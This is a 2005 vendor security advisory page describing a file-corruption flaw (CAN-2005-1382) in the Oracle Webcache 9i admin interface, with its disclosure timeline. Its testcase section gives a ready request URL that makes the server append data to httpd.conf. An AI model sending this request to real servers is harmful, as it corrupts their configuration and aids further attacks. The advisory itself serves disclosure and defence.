Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Append file in Oracle Webcache 9i

Name Append file in Oracle Webcache 9i
Systems Affected Oracle Application Server with Webcache 9i
Severity Medium Risk
Category Corruption of files
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 11 May 2005 (V 1.02)
CAN-Number CAN-2005-1382


Details
It is possible to corrupt any file of an Oracle Application Server installation by appending garbage to the file (e.g. httpd.conf).
This issue can be combined with cross site scripting vulnerabilities in the webcache administrator application. Patch Information
Oracle fixed this issue with informing me or their customers.

Testcase
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&
index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf


History
23-sep-2003 Oracle was secalert informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
11-may-2005 CAN added




2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Webcache


Oracle Webcache is part of the Oracle Application Server aka OAS aka IAS

The Oracle Web Cache can be used to cache static and dynamically generated web pages. The cache shouild be your first point for accepting user requests from clients using web browsers.

The Web Cache also provides load balancing and can route non-cached requests to a set of web servers. This privides protection when some of the servers are overloaded or become inaccessable.